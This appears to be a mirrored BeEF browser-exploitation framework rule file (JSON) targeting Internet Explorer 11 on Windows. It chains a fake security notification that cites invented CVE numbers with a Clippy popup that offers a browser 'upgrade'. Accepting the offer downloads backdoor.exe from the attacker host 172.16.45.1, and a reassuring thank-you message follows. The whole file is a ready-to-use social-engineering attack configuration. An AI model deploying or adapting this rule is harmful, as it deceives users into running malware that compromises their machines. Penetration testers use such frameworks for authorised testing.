Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/arerules/ie_win_fakenotification-clippy.json
1146 views
1
{
2
"name": "Ie Fake Notification + Clippy",
3
"author": "antisnatchor",
4
"browser": "IE",
5
"browser_version": "== 11",
6
"os": "Windows",
7
"os_version": ">= 7",
8
"modules": [
9
{
10
"name": "fake_notification",
11
"condition": null,
12
"options": {
13
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
14
}
15
}
16
,{
17
"name": "clippy",
18
"condition": null,
19
"options": {
20
"clippydir": "http://172.16.45.1:3000/clippy/",
21
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
22
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
23
"respawntime":"5000",
24
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
25
}
26
}
27
],
28
"execution_order": [0,1],
29
"execution_delay": [0,2000],
30
"chain_mode": "sequential"
31
}
32
33